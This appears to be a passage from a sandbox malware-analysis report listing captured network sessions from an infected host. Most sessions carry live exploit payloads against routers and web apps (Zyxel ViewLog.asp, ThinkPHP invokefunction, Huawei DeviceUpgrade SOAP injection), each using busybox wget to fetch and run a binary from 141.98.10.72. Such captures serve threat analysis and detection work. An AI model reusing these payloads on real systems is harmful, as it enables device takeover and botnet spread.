                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:27:57.330719948 CET321INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Wed, 14 Feb 2024 08:27:57 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Content-Length: 146
                                                            Connection: keep-alive
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            68192.168.2.234329894.70.172.2418080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:57.101692915 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:27:57.340094090 CET388INHTTP/1.1 404 Not Found
                                                            Date: Mon, 04 May 1970 21:40:10 GMT
                                                            Server: DNVRS-Webs
                                                            Cache-Control: no-cache
                                                            Content-Length: 166
                                                            Content-Type: text/html
                                                            Connection: keep-alive
                                                            Keep-Alive: timeout=60, max=99
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            69192.168.2.2352214104.171.178.7323
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:57.102986097 CET179INHTTP/1.0 200 OK
                                                            Server: Proxy
                                                            Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 32 37 3a 35 32 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                                            Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:27:52Auth Result: .


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            70192.168.2.234315694.123.41.2208080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:57.114361048 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            71192.168.2.2352238104.171.178.7323
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:57.431739092 CET179INHTTP/1.0 200 OK
                                                            Server: Proxy
                                                            Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 32 37 3a 35 33 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                                            Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:27:53Auth Result: .


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            72192.168.2.235891295.70.156.5080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:57.721225977 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:27:57.962871075 CET404INHTTP/1.1 400 Bad Request
                                                            Date: Wed, 14 Feb 2024 08:27:57 GMT
                                                            Server: Apache
                                                            Content-Length: 226
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            73192.168.2.2352244104.171.178.7323
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:57.750423908 CET179INHTTP/1.0 200 OK
                                                            Server: Proxy
                                                            Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 32 37 3a 35 33 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                                            Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:27:53Auth Result: .


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            74192.168.2.2357264112.74.204.4880
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:59.068447113 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:27:59.413800001 CET338INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Wed, 14 Feb 2024 08:27:59 GMT
                                                            Content-Type: text/html; charset=uff-8
                                                            Content-Length: 166
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            75192.168.2.2349072112.125.90.5380
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:59.103960037 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:27:59.443550110 CET337INHTTP/1.1 400 Bad Request
                                                            Server: nginx/1.14.1
                                                            Date: Wed, 14 Feb 2024 08:27:59 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 173
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.1</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            76192.168.2.2333588112.51.126.12080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:59.104331970 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            77192.168.2.2333586112.51.126.12080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:59.114628077 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            78192.168.2.233983241.37.168.25337215
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:59.210683107 CET826OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 34 31 2e 39 38 2e 31 30 2e 37 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 6d 69 70 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 141.98.10.72 -l /tmp/binary -r /mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary mips)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                            Feb 14, 2024 09:27:59.513219118 CET182INHTTP/1.1 500 Internal Server Error
                                                            Content-Type: text/xml; charset="utf-8"
                                                            Server: Linux UPnP/1.0 Huawei-ATP-IGD
                                                            EXT:
                                                            Connection: Keep-Alive
                                                            Content-Length: 398


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            79192.168.2.234165495.100.58.7380
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:59.276834011 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:27:59.485255003 CET479INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 257
                                                            Expires: Wed, 14 Feb 2024 08:27:59 GMT
                                                            Date: Wed, 14 Feb 2024 08:27:59 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 63 31 36 31 35 30 32 26 23 34 36 3b 31 37 30 37 38 39 39 32 37 39 26 23 34 36 3b 31 37 35 66 64 61 32 32 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;c161502&#46;1707899279&#46;175fda22</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            80192.168.2.235784895.237.86.25180
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:59.280267000 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:27:59.492161036 CET307INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Wed, 14 Feb 2024 08:27:59 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 150
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            81192.168.2.234965095.101.11.7680
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:59.286174059 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:27:59.504092932 CET480INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 258
                                                            Expires: Wed, 14 Feb 2024 08:27:59 GMT
                                                            Date: Wed, 14 Feb 2024 08:27:59 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 34 63 30 62 36 35 35 66 26 23 34 36 3b 31 37 30 37 38 39 39 32 37 39 26 23 34 36 3b 31 37 65 63 36 30 30 62 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;4c0b655f&#46;1707899279&#46;17ec600b</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            82192.168.2.233787695.57.133.11080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:59.359606028 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:27:59.651145935 CET29INHTTP/1.1 200 OK
                                                            Feb 14, 2024 09:27:59.651220083 CET515INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68
                                                            Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            83192.168.2.233861494.187.107.2318080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:00.146621943 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            84192.168.2.235550694.121.18.978080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:00.157104969 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            85192.168.2.234422031.148.175.2148080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:00.187151909 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
